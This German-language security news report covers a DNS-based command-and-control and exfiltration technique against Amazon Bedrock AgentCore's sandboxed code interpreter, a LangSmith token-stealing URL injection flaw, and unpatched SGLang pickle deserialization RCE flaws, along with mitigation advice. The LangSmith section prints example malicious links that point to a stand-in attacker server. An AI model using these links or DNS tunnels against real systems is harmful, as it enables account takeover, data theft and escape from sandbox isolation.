Cybersicherheitsforscher haben neue Methoden zur Exfiltration sensibler Daten aus KI-Codeausführungsumgebungen mittels DNS-Abfragen (Domain Name System) aufgedeckt. Diese Erkenntnisse, zusammen mit separaten Offenlegungen bezüglich **LangSmith** und **SGLang**, unterstreichen den wachsenden Bedarf an robusten Sicherheitsmaßnahmen in KI-Infrastrukturen.  ### Schwachstelle im Amazon Bedrock AgentCore Code Interpreter Ein Bericht von **BeyondTrust**, der diese Woche veröffentlicht wurde, beschreibt, wie der Sandbox-Modus des **Amazon Bedrock AgentCore Code Interpreters** ausgehende DNS-Abfragen zulässt, was Angreifern potenziell die Einrichtung interaktiver Shells und die Umgehung von Netzwerkisolierung ermöglicht. Dieses Problem, für das derzeit keine **CVE**-Kennung vorliegt, wurde mit einem CVSS-Score von 7,5 von 10,0 bewertet. Der im August 2025 gestartete **Amazon Bedrock AgentCore Code Interpreter** wurde entwickelt, um KI-Agenten die sichere Ausführung von Code in isolierten Sandbox-Umgebungen zu ermöglichen und zu verhindern, dass agentenbasierte Workloads auf externe Systeme zugreifen. Laut **Kinnaird McQuade**, Chief Security Architect bei **BeyondTrust**, könnte die Tatsache, dass der Dienst trotz einer Konfiguration mit "keinem Netzwerkzugriff" DNS-Abfragen zulässt, "Bedrohungsakteuren ermöglichen, Command-and-Control-Kanäle und Datenexfiltration über DNS in bestimmten Szenarien einzurichten und dabei die erwarteten Netzwerkisolationskontrollen zu umgehen." In einem Proof-of-Concept-Angriff demonstrierten Forscher, wie ein Bedrohungsakteur dieses Verhalten nutzen könnte, um einen bidirektionalen Kommunikationskanal über DNS-Abfragen und -Antworten herzustellen. Dies könnte zur Erlangung einer interaktiven Reverse-Shell, zur Exfiltration sensibler Informationen über DNS-Abfragen (vorausgesetzt, die IAM-Rolle verfügt über die erforderlichen Berechtigungen für den Zugriff auf **AWS**-Ressourcen wie **S3**-Buckets) und zur Ausführung von Befehlen führen. Darüber hinaus kann der DNS-Kommunikationskanal ausgenutzt werden, um zusätzliche Payloads an den Code Interpreter zu liefern, ihn dazu zu veranlassen, einen DNS-Command-and-Control (C2)-Server auf Befehle abzufragen, die in DNS A-Records gespeichert sind, diese auszuführen und die Ergebnisse über DNS-Subdomain-Abfragen zurückzugeben. Die Forscher betonten, dass falsch konfigurierte IAM-Rollen das Problem verschärfen könnten. Eine überprivilegierte Rolle, die dem Dienst zugewiesen ist, könnte ihm zu weitreichende Berechtigungen für den Zugriff auf sensible Daten gewähren. "Diese Forschung zeigt, wie DNS-Auflösung die Netzwerkisolationsgarantien von sandboxed Code Interpretern untergraben kann", erklärte **BeyondTrust**. "Durch die Verwendung dieser Methode könnten Angreifer sensible Daten aus AWS-Ressourcen exfiltriert haben, auf die über die IAM-Rolle des Code Interpreters zugegriffen werden kann, was potenziell zu Ausfallzeiten, Datenlecks mit sensiblen Kundeninformationen oder gelöschter Infrastruktur führen könnte."  Nach einer verantwortungsvollen Offenlegung im September 2025 klassifizierte **Amazon** das Verhalten als beabsichtigte Funktionalität und nicht als Defekt. Sie empfehlen die Verwendung des VPC-Modus anstelle des Sandbox-Modus für eine vollständige Netzwerkisolierung und schlagen die Verwendung einer DNS-Firewall zur Filterung ausgehender DNS-Datenverkehrs vor. **Jason Soroko**, Senior Fellow bei **Sectigo**, rät: "Um sensible Workloads zu schützen, sollten Administratoren alle aktiven AgentCore Code Interpreter-Instanzen inventarisieren und solche, die kritische Daten verarbeiten, sofort vom Sandbox-Modus in den VPC-Modus migrieren." Er fügte hinzu: "Der Betrieb innerhalb einer VPC bietet die notwendige Infrastruktur für eine robuste Netzwerkisolierung, sodass Teams strenge Sicherheitsgruppen, Netzwerk-ACLs und Route53 Resolver DNS Firewalls implementieren können, um unbefugte DNS-Auflösungen zu überwachen und zu blockieren. Schließlich müssen Sicherheitsteams die an diese Interpreter angehängten IAM-Rollen rigoros prüfen und das Prinzip der geringsten Privilegien strikt durchsetzen, um den potenziellen Schaden bei einer Kompromittierung zu begrenzen."  ### Kontoübernahme-Schwachstelle in LangSmith In verwandten Nachrichten gab **Miggo Security** eine hochgradige Sicherheitslücke in **LangSmith** (**CVE-2026-25750**, CVSS-Score: 8,5) bekannt, die zu Token-Diebstahl und Kontoübernahme führen könnte. Dieses Problem, das sowohl selbst gehostete als auch Cloud-Bereitstellungen betrifft, wurde in **LangSmith** Version 0.12.71 behoben, die im Dezember 2025 veröffentlicht wurde. Die Schwachstelle beruht auf fehlender Validierung des `baseUrl`-Parameters, was eine URL-Parameter-Injektion ermöglicht. Ein Angreifer könnte dies ausnutzen, indem er einen Benutzer dazu verleitet, auf einen speziell gestalteten Link zu klicken, was zum Diebstahl seines Bearer-Tokens, seiner Benutzer-ID und seiner Workspace-ID führt. Beispiel-Links sind: * Cloud - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com * Selbstgehostet - <LangSmith_domain_des_kunden>/studio/?baseUrl=https://attacker-server.com Eine erfolgreiche Ausnutzung könnte unbefugten Zugriff auf die Trace-Historie der KI gewähren, potenziell interne SQL-Abfragen, CRM-Kundenaufzeichnungen oder proprietären Quellcode durch Überprüfung von Tool-Aufrufen preisgeben. **Liad Eliyahu** und **Eliana Vuijsje**, Forscher bei **Miggo**, erklärten: "Ein angemeldeter LangSmith-Benutzer könnte kompromittiert werden, allein durch den Zugriff auf eine Angreifer-kontrollierte Website oder durch Klicken auf einen bösartigen Link."  Sie fügten hinzu: "Diese Schwachstelle ist eine Erinnerung daran, dass KI-Observability-Plattformen jetzt kritische Infrastrukturen sind. Da diese Tools die Flexibilität der Entwickler priorisieren, umgehen sie oft unbeabsichtigt Sicherheitskontrollen. Dieses Risiko wird dadurch verstärkt, dass KI-Agenten, ähnlich wie "traditionelle" Software, tiefen Zugriff auf interne Datenquellen und Drittanbieterdienste haben." ### Unsichere Pickle-Deserialisierungs-Schwachstellen in SGLang Schließlich wurden Schwachstellen in **SGLang** identifiziert, einem beliebten Open-Source-Framework für die Bereitstellung von Large Language Models und multimodalen KI-Modellen. Eine erfolgreiche Ausnutzung könnte zu unsicherer Pickle-Deserialisierung führen, was potenziell zur Remote Code Execution führen könnte. Diese Schwachstellen, die von **Igor Stepansky**, einem Orca-Sicherheitsforscher, entdeckt wurden, sind noch nicht behoben. Die Schwachstellen sind: * **CVE-2026-3059** (CVSS-Score: 9,8) - Eine nicht authentifizierte Remote Code Execution-Schwachstelle über den ZeroMQ (auch bekannt als ZMQ) Broker, der unvertrauenswürdige Daten mittels pickle.loads() ohne Authentifizierung deserialisiert. Sie betrifft das multimodale Generierungsmodul von SGLang. * **CVE-2026-3060** (CVSS-Score: 9,8) - Eine nicht authentifizierte Remote Code Execution-Schwachstelle über das Disaggregation-Modul, das unvertrauenswürdige Daten mittels pickle.loads() ohne Authentifizierung deserialisiert. Sie betrifft SGLang.